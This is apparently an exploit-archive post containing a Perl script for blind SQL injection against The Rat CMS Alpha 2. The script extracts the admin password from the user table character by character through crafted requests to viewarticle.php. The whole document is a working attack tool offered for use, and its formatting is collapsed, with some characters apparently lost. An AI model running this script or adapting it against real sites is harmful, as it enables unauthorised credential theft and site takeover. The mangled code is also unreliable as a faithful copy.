theratcms-sql.txt
Posted on 06 January 2009
#--+++=============================================================+++--# #--+++====== The Rat CMS Alpha 2 Blind SQL Injection Exploit ======+++--# #--+++=============================================================+++--# #!/usr/bin/perl use strict; use warnings; use IO::Socket; sub query { my $chr = shift; my $pos = shift; my $query = "'x' OR ASCII(SUBSTRING((SELECT user_password FROM tbl_auth_user WHERE user_id = 'theadmin'),${pos},1))=${chr}"; $query =~ s/ /%20/g; $query =~ s/'/%27/g; return $query; } sub check { my $host = shift; my $path = shift; my $chr = ord (shift); my $pos = shift; my $sock = new IO::Socket::INET ( PeerHost => $host, PeerPort => 80, Proto => "tcp", ); my $query = query ($chr, $pos); print $sock "GET ${path}/viewarticle.php?id=${query} HTTP1.1 "; my $x; while (<$sock>) { $x .= $_; } $x =~ s/s/ /g; $x =~ /<h1 align="center">(.+?)/h1>/; if (length ($1) > 1) { return 1; } else { return 0; } close ($sock); } sub usage { print " [+] The Rat CMS Alpha 2 Blind SQL Injection Exploit". " [+] Author: darkjoker". " [+] Site: http://darkjoker.net23.net". " [+] Usage: perl $0 <hostname> <path>". " [+] Greetz: certaindeath "; exit (); } my $host = shift; my $path = shift or usage; my @key = split '', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*'; my $pos = 1; my $chr = 0; while ($pos <= 32) { if (check ($host, $path, $key [$chr], $pos)) { print $key [$chr]; $chr = -1; $pos++; } $chr++; } print " ";
